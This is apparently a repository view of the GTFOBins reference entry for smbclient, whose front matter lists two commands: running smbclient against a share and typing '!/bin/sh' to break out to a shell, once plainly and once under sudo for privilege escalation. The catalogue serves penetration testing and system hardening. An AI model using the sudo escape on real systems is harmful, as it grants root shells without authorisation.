GTFOBins.github.io/_gtfobins/smbclient.md

13 lines
217 B
Markdown
Raw Normal View History

---
description: A valid SMB/CIFS server must be available.
functions:
2018-10-05 19:55:38 +02:00
shell:
- code: |
smbclient \\ip\share
!/bin/sh
2018-10-05 19:55:38 +02:00
sudo:
- code: |
sudo smbclient \\ip\share
!/bin/sh
---